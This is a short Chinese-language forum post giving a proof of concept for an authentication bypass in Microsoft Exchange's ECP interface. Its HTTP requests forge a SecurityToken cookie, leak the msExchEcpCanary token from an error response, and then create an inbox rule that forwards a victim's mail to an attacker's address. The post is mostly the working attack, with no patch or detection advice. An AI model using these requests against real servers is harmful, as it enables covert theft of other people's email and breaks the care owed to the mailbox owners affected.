漏洞原因:
漏洞出现在“委托身份验证”的功能中,如果前端header中存在非空的SecurityToken的Cookie时,就会直接请求后端服务,不会加载委托认证的模块(DelegatedAuthModule)。
1. 向受目标服务器请求poc泄露msExchEcpCanary
[AppleScript] 纯文本查看 复制代码 POST /ecp/test1@test.com/RulesEditor/InboxRules.svc/NewObject
...
Cookie: SecurityToken=x
...
2. 在response 500 错误的header中找到msExchEcpCanary
3. 使用 msExchEcpCanary 值代入,请求设置转发规则
[AppleScript] 纯文本查看 复制代码 POST /ecp/RulesEditor/InboxRules.svc/NewObject?msExchEcpCanary=$token
...
Cookie: SecurityToken=x
...
{"properties":{"ForwardTo":[{"RawIdentity":"myemail@test.com","DisplayName":"myemail","Address":"myemail@test.com","AddressOrigin":3,"RecipientFlag":0,"RoutingType":"SMTP","SMTPAddress":"myemail@test.com"}],"Name":"test","StopProcessingRules":"true"}}
| 
匿名
发表于 2021-9-2 21:23:10
